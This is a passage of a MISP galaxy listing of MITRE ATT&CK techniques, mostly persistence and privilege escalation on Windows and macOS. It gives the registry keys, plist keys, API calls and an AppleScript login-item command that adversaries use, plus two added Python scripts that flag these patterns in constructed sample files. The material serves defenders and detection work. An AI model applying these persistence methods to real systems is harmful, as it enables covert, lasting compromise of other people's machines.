The tag is: misp-galaxy:mitre-attack-pattern="Scan Databases - T1596.005"

Table 6155. Table References

Links

https://attack.mitre.org/techniques/T1596/005

https://shodan.io

Application Shimming - T1546.011

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017)

Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS.

A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:

  • <code>%WINDIR%\AppPatch\sysmain.sdb</code> and

  • <code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb</code>

Custom databases are stored in:

  • <code>%WINDIR%\AppPatch\custom & %WINDIR%\AppPatch\AppPatch64\Custom</code> and

  • <code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom</code>

To keep shims secure, Windows runs them in user mode, so they cannot modify the kernel, and administrator privileges are required to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structured Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).

Utilizing these shims may allow an adversary to perform several malicious acts, such as elevating privileges, installing backdoors, or disabling defenses like Windows Defender. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.

The tag is: misp-galaxy:mitre-attack-pattern="Application Shimming - T1546.011"

Table 6156. Table References

Links

http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf

https://attack.mitre.org/techniques/T1546/011

https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Plist Modification - T1547.011

Adversaries can modify property list files (plist files) to execute their code as part of establishing persistence. Plist files are used by macOS applications to store properties and configuration settings for applications and services. Applications use information plist files, <code>Info.plist</code>, to tell the operating system how to handle the application at runtime using structured metadata in the form of keys and values. Plist files are formatted in XML and based on Apple’s Core Foundation DTD and can be saved in text or binary format.(Citation: fileinfo plist file description)

Adversaries can modify paths to executed binaries, add command line arguments, and insert key/pair values to plist files in auto-run locations which execute upon user logon or system startup. Through modifying plist files in these locations, adversaries can also execute a malicious dynamic library (dylib) by adding a dictionary containing the <code>DYLD_INSERT_LIBRARIES</code> key combined with a path to a malicious dylib under the <code>EnvironmentVariables</code> key in a plist file. Upon user logon, the plist is called for execution and the malicious dylib is executed within the process space. Persistence can also be achieved by modifying the <code>LSEnvironment</code> key in the application’s <code>Info.plist</code> file.(Citation: wardle artofmalware volume1)
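An added audit script (example code, not part of the MISP galaxy or of ATT&CK) that parses plist files with Python's plistlib and reports the patterns just described: a DYLD_INSERT_LIBRARIES entry (generalised here to any DYLD_* variable, since all of them change what dyld loads) under EnvironmentVariables or LSEnvironment, and a launchd program path outside the usual system locations. The three plists and the prefix list are constructed for this example.

```python
"""Flag the plist persistence patterns described above (added example, not MISP/ATT&CK code)."""
import plistlib
from typing import Any, Dict, List, Optional

# Constructed LaunchAgent plist: DYLD_INSERT_LIBRARIES under EnvironmentVariables,
# and a program living outside the normal system locations. Not a real sample.
SAMPLE_LAUNCH_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.example.constructed.agent</string>
    <key>ProgramArguments</key>
    <array>
        <string>/Users/Shared/.cache/agent</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>EnvironmentVariables</key>
    <dict>
        <key>DYLD_INSERT_LIBRARIES</key>
        <string>/Users/Shared/.cache/libhelper.dylib</string>
    </dict>
</dict>
</plist>
"""

# Constructed application Info.plist using the LSEnvironment key.
SAMPLE_INFO_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>CFBundleIdentifier</key>
    <string>com.example.constructed.app</string>
    <key>LSEnvironment</key>
    <dict>
        <key>DYLD_INSERT_LIBRARIES</key>
        <string>/Library/Application Support/Example/libhelper.dylib</string>
    </dict>
</dict>
</plist>
"""

# Constructed benign LaunchDaemon plist for comparison.
SAMPLE_BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.example.constructed.daemon</string>
    <key>Program</key>
    <string>/usr/libexec/example-daemon</string>
    <key>KeepAlive</key>
    <true/>
</dict>
</plist>
"""

# Where launchd-started programs normally live; anything else is reported for review.
# This prefix list is a heuristic chosen for the example, not a rule from the text.
EXPECTED_PROGRAM_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/", "/Applications/")
# The two dictionaries the text names as carriers of injected environment variables.
ENV_CONTAINERS = ("EnvironmentVariables", "LSEnvironment")


def _program_path(data: Dict[str, Any]) -> Optional[str]:
    """Return the executable a launchd plist starts, from Program or ProgramArguments[0]."""
    program = data.get("Program")
    if isinstance(program, str):
        return program
    args = data.get("ProgramArguments")
    if isinstance(args, list) and args and isinstance(args[0], str):
        return args[0]
    return None


def audit_plist(plist_bytes: bytes) -> List[str]:
    """Return human-readable findings for one plist (empty list if nothing is flagged)."""
    data = plistlib.loads(plist_bytes)  # accepts both XML and binary plists
    if not isinstance(data, dict):
        return []
    findings: List[str] = []
    for container in ENV_CONTAINERS:
        env = data.get(container)
        if not isinstance(env, dict):
            continue
        for name, value in env.items():
            # DYLD_INSERT_LIBRARIES is the variable named in the text; any DYLD_*
            # variable alters what dyld loads into the process, so all are reported.
            if name.upper().startswith("DYLD_"):
                findings.append(f"{container}.{name} = {value}")
    program = _program_path(data)
    if program is not None and not program.startswith(EXPECTED_PROGRAM_PREFIXES):
        findings.append(f"program outside expected locations: {program}")
    return findings


if __name__ == "__main__":
    for label, blob in (("launch agent", SAMPLE_LAUNCH_AGENT),
                        ("Info.plist", SAMPLE_INFO_PLIST),
                        ("benign daemon", SAMPLE_BENIGN)):
        print(label, audit_plist(blob) or ["clean"])
```

Run it over the contents of ~/Library/LaunchAgents, /Library/LaunchAgents, /Library/LaunchDaemons and application bundles' Contents/Info.plist to get a review list; a hit on a signed application's own Info.plist still needs manual confirmation.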

The tag is: misp-galaxy:mitre-attack-pattern="Plist Modification - T1547.011"

Table 6157. Table References

Links

https://attack.mitre.org/techniques/T1547/011

https://fileinfo.com/extension/plist

https://taomm.org/vol1/pdfs.html

Print Processors - T1547.012

Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot.(Citation: Microsoft Intro Print Processors)

Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the <code>AddPrintProcessor</code> API call with an account that has <code>SeLoadDriverPrivilege</code> enabled. Alternatively, a print processor can be registered to the print spooler service by adding the <code>HKLM\SYSTEM\[CurrentControlSet or ControlSet001]\Control\Print\Environments\[Windows architecture: e.g., Windows x64]\Print Processors\[user defined]\Driver</code> Registry key that points to the DLL.

For the malicious print processor to be correctly installed, the payload must be located in the dedicated system print-processor directory, that can be found with the <code>GetPrintProcessorDirectory</code> API call, or referenced via a relative path from this directory.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020)

The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.

The tag is: misp-galaxy:mitre-attack-pattern="Print Processors - T1547.012"

Table 6158. Table References

Links

https://attack.mitre.org/techniques/T1547/012

https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor

https://learn.microsoft.com/windows-hardware/drivers/print/introduction-to-print-processors

https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/

PowerShell Profile - T1546.013

Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (<code>profile.ps1</code>) is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) starts and can be used as a logon script to customize user environments.

[PowerShell](https://attack.mitre.org/techniques/T1059/001) supports several profiles depending on the user or host program. For example, there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles)

Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) session the modified script will be executed unless the <code>-NoProfile</code> flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019)

An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)

The tag is: misp-galaxy:mitre-attack-pattern="PowerShell Profile - T1546.013"

Table 6159. Table References

Links

http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf

https://attack.mitre.org/techniques/T1546/013

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-6

https://docs.microsoft.com/powershell/module/microsoft.powershell.core/about/about_profiles

https://witsendandshady.blogspot.com/2019/06/lab-notes-persistence-and-privilege.html

https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/

Active Setup - T1547.014

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account’s associated permissions level.

Adversaries may abuse Active Setup by creating a key under <code>HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\</code> and setting a malicious value for <code>StubPath</code>. This value will serve as the program that will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016)

Adversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.
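An added audit script (example code, not from the MISP galaxy or ATT&CK) covering the two Registry persistence locations described above, the Print Processors keys and the Active Setup Installed Components keys. It parses the text (.reg) format that reg.exe and regedit export, so it works on an offline dump; the sample export, its GUIDs, names and paths, and the trusted-directory list are constructed for this example.

```python
"""Audit a registry export for Print Processor and Active Setup persistence (added example)."""
import re
from typing import Dict, List

# Constructed .reg text (reg.exe export format); GUIDs, names and paths are made up.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{00000000-0000-0000-0000-000000000001}]
@="Constructed benign component"
"StubPath"="%SystemRoot%\\system32\\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\\system32\\example.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{00000000-0000-0000-0000-000000000002}]
@="Constructed component to review"
"StubPath"="C:\\Users\\Public\\Libraries\\helper.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\winprint]
"Driver"="winprint.dll"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\ConstructedProc]
"Driver"="..\\..\\..\\Users\\Public\\Libraries\\helper.dll"
"""

RegDump = Dict[str, Dict[str, str]]  # key path -> {value name -> data}

ACTIVE_SETUP_PREFIX = "hkey_local_machine\\software\\microsoft\\active setup\\installed components\\"
PRINT_PROC_KEY = re.compile(
    r"^HKEY_LOCAL_MACHINE\\SYSTEM\\(?:CurrentControlSet|ControlSet\d{3})\\Control\\Print"
    r"\\Environments\\[^\\]+\\Print Processors\\([^\\]+)$", re.IGNORECASE)
# Directories a StubPath program is expected to live in; a heuristic chosen for this example.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
_VALUE_LINE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')


def _unescape(s: str) -> str:
    """Undo the .reg escaping of backslashes and double quotes."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text: str) -> RegDump:
    """Parse the text form of a registry export (decode UTF-16 first if read from regedit)."""
    dump: RegDump = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            dump.setdefault(current, {})
            continue
        m = _VALUE_LINE.match(line)
        if current is None or not m:
            continue
        name = "(Default)" if m.group(1) == "@" else _unescape(m.group(1)[1:-1])
        data = m.group(2)
        if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            data = _unescape(data[1:-1])  # REG_SZ; dword:/hex: values are kept raw
        dump[current][name] = data
    return dump


def _executable_of(command: str) -> str:
    """Lower-cased executable path of a command line, with %SystemRoot%/%windir% expanded."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        exe = command[1:end] if end > 0 else command[1:]
    else:
        exe = command.split(" ", 1)[0]  # unquoted paths containing spaces get truncated here
    exe = exe.lower()
    for var in ("%systemroot%", "%windir%"):
        exe = exe.replace(var, "c:\\windows")
    return exe


def audit_active_setup(dump: RegDump) -> List[str]:
    """Report Installed Components whose StubPath runs a program outside TRUSTED_DIRS."""
    findings: List[str] = []
    for key, values in dump.items():
        if not key.lower().startswith(ACTIVE_SETUP_PREFIX) or "StubPath" not in values:
            continue
        stub = values["StubPath"]
        component = key.rsplit("\\", 1)[-1]
        if not _executable_of(stub).startswith(TRUSTED_DIRS):
            findings.append(f"Active Setup {component}: StubPath outside trusted dirs: {stub}")
    return findings


def audit_print_processors(dump: RegDump) -> List[str]:
    """Report print processors whose Driver is a path, or that are not the built-in winprint."""
    findings: List[str] = []
    for key, values in dump.items():
        m = PRINT_PROC_KEY.match(key)
        if not m:
            continue
        name, driver = m.group(1), values.get("Driver", "")
        if "\\" in driver or "/" in driver or ".." in driver:
            # Driver should be a bare DLL name inside the print-processor directory;
            # a path or traversal sequence points somewhere else.
            findings.append(f"Print processor {name}: Driver is a path, not a DLL name: {driver}")
        elif name.lower() != "winprint":
            findings.append(f"Print processor {name}: not the built-in winprint, verify {driver}")
    return findings


if __name__ == "__main__":
    dump = parse_reg_export(SAMPLE_REG_EXPORT)
    for line in audit_active_setup(dump) + audit_print_processors(dump):
        print(line)
```

Printer drivers legitimately register their own processors, so the non-winprint report is a review list, not a verdict; the path-shaped Driver value is the stronger signal.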

The tag is: misp-galaxy:mitre-attack-pattern="Active Setup - T1547.014"

Table 6160. Table References

Links

https://attack.mitre.org/techniques/T1547/014

https://citizenlab.ca/2015/12/packrat-report/

https://digital-forensics.sans.org/summit-archives/2010/35-glyer-apt-persistence-mechanisms.pdf

https://helgeklein.com/blog/2010/04/active-setup-explained/

https://securelist.com/whos-really-spreading-through-the-bright-star/68978/

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/

https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html

Login Items - T1547.015

Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.

Login items installed using the Service Management Framework leverage <code>launchd</code>, are not visible in the System Preferences, and can only be removed by the application that created them.(Citation: Adding Login Items)(Citation: SMLoginItemSetEnabled Schroeder 2013) Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.(Citation: Launch Services Apple Developer) Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.

Adversaries can utilize [AppleScript](https://attack.mitre.org/techniques/T1059/002) and [Native API](https://attack.mitre.org/techniques/T1106) calls to create a login item to spawn malicious executables.(Citation: ELC Running at startup) Prior to version 10.5 on macOS, adversaries can add login items by using [AppleScript](https://attack.mitre.org/techniques/T1059/002) to send Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.(Citation: Login Items AE) Adversaries can use a command such as <code>tell application “System Events” to make login item at end with properties /path/to/executable</code>.(Citation: Startup Items Eclectic)(Citation: hexed osx.dok analysis 2019)(Citation: Add List Remove Login Items Apple Script) This command adds the path of the malicious executable to the login item file list located in <code>~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm</code>.(Citation: Startup Items Eclectic) Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)(Citation: objsee netwire backdoor 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Login Items - T1547.015"

Table 6161. Table References

Links

http://www.hexed.in/2019/07/osxdok-analysis.html

https://attack.mitre.org/techniques/T1547/015

https://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/

https://blog.timschroeder.net/2013/04/21/smloginitemsetenabled-demystified/

https://developer.apple.com/documentation/coreservices/launch_services

https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1

https://developer.apple.com/library/archive/samplecode/LoginItemsAE/Introduction/Intro.html#//apple_ref/doc/uid/DTS10003788

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html

https://eclecticlight.co/2018/05/22/running-at-startup-when-to-use-a-login-item-or-a-launchagent-launchdaemon/

https://eclecticlight.co/2021/09/16/how-to-run-an-app-or-tool-at-startup/

https://gist.github.com/kaloprominat/6111584

https://objective-see.com/blog/blog_0x25.html

https://objective-see.com/blog/blog_0x31.html

https://objective-see.com/blog/blog_0x44.html

https://support.apple.com/guide/mac-help/open-items-automatically-when-you-log-in-mh15189/mac

https://www.sentinelone.com/blog/how-malware-persists-on-macos/

Installer Packages - T1546.016

Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)

Adversaries have distributed legitimate applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS postinstall scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)) with the elevated permissions.(Citation: Application Bundle Manipulation Brandon Dalton)(Citation: wardle evilquest parti)

Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include preinst, postinst, prerm, postrm scripts and run as root when executed.

For Windows, the Microsoft Installer service uses .msi files to manage the installing, updating, and uninstalling of applications. Adversaries have leveraged Prebuild and Postbuild events to run commands before or after a build when installing .msi files.(Citation: Windows AppleJeus GReAT)(Citation: Debian Manual Maintainer Scripts)

The tag is: misp-galaxy:mitre-attack-pattern="Installer Packages - T1546.016"

Table 6162. Table References

Links

https://attack.mitre.org/techniques/T1546/016

https://cpb-us-e1.wpmucdn.com/sites.psu.edu/dist/4/24696/files/2019/07/psumac2019-345-Installer-Package-Scripting-Making-your-deployments-easier-one-at-a-time.pdf

https://objective-see.com/blog/blog_0x59.html

https://redcanary.com/blog/mac-application-bundles/

https://securelist.com/operation-applejeus/87553/

https://www.debian.org/doc/debian-policy/ch-maintainerscripts.html#s-mscriptsinstact

Identify groups/roles - T1270

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1270).

Personnel internal to a company may belong to a group or hold a role with specialized electronic access, authorities, or privileges that make them an attractive target for an adversary. One example of this is a system administrator. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Identify groups/roles - T1270"

Table 6163. Table References

Links

https://attack.mitre.org/techniques/T1270

Proxy/protocol relays - T1304

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1304).

Proxies act as an intermediary for clients seeking resources from other systems. Using a proxy may make it more difficult to track back the origin of a network communication. (Citation: APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Proxy/protocol relays - T1304"

Table 6164. Table References

Links

https://attack.mitre.org/techniques/T1304

Scheduled Task/Job - T1053

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.(Citation: ProofPoint Serpent)

The tag is: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053"

Table 6165. Table References

Links

https://attack.mitre.org/techniques/T1053

https://technet.microsoft.com/en-us/library/cc785125.aspx

https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain

Scheduled Task/Job - T1603

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. On Android and iOS, APIs and libraries exist to facilitate scheduling tasks to execute at a specified date, time, or interval.

On Android, the WorkManager API allows asynchronous tasks to be scheduled with the system. WorkManager was introduced to unify task scheduling on Android, using JobScheduler, GcmNetworkManager, and AlarmManager internally. WorkManager offers a lot of flexibility for scheduling, including periodically, one time, or constraint-based (e.g. only when the device is charging).(Citation: Android WorkManager)

On iOS, the NSBackgroundActivityScheduler API allows asynchronous tasks to be scheduled with the system. The tasks can be scheduled to be repeating or non-repeating, however, the system chooses when the tasks will be executed. The app can choose the interval for repeating tasks, or the delay between scheduling and execution for one-time tasks.(Citation: Apple NSBackgroundActivityScheduler)

The tag is: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1603"

Table 6166. Table References

Links

https://attack.mitre.org/techniques/T1603

https://developer.android.com/topic/libraries/architecture/workmanager

https://developer.apple.com/documentation/foundation/nsbackgroundactivityscheduler

Develop KITs/KIQs - T1227

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1227).

Leadership derives Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) from the areas of most interest to them. KITs are an expression of management’s intelligence needs with respect to early warning, strategic and operational decisions, knowing the competition, and understanding the competitive situation. KIQs are the critical questions aligned by KIT which provide the basis for collection plans, create a context for analytic work, and/or identify necessary external operations. (Citation: Herring1999)

The tag is: misp-galaxy:mitre-attack-pattern="Develop KITs/KIQs - T1227"

Table 6167. Table References

Links

https://attack.mitre.org/techniques/T1227

System Shutdown/Reboot - T1529

Adversaries may shut down/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. <code>reload</code>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)

Shutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.

Adversaries may attempt to shut down/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)

The tag is: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529"

Table 6168. Table References

Links

https://attack.mitre.org/techniques/T1529

https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html

https://blog.talosintelligence.com/2018/02/olympic-destroyer.html

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown

https://www.cisa.gov/uscert/ncas/alerts/TA18-106A

Virtualization/Sandbox Evasion - T1633

Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors after checking for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware’s behavior to disengage from the victim or conceal the core functions of the payload. They may also search for VME artifacts before dropping further payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1633) during automated discovery to shape follow-on behaviors.

Adversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1633) such as checking for system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine whether the malware is running in an analysis environment.

The tag is: misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1633"

Table 6169. Table References

Links

https://attack.mitre.org/techniques/T1633

Virtualization/Sandbox Evasion - T1497

Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)

Adversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine whether the malware is running in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497"

Table 6170. Table References

Links

https://attack.mitre.org/techniques/T1497

https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc

https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/

Data Obfuscation - T1001

Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher, to make the communication less conspicuous, and to keep commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.

The tag is: misp-galaxy:mitre-attack-pattern="Data Obfuscation - T1001"

Table 6171. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1001

Web Shell - T1100

A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013)

Web shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in case an adversary’s primary access methods are detected and removed.

The tag is: misp-galaxy:mitre-attack-pattern="Web Shell - T1100"

Table 6172. Table References

Links

https://attack.mitre.org/techniques/T1100

https://capec.mitre.org/data/definitions/650.html

https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html

https://www.us-cert.gov/ncas/alerts/TA15-314A

Automated Exfiltration - T1020

Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.

When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).

The tag is: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020"

Table 6173. Table References

Links

https://attack.mitre.org/techniques/T1020

Hardware Additions - T1200

Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.

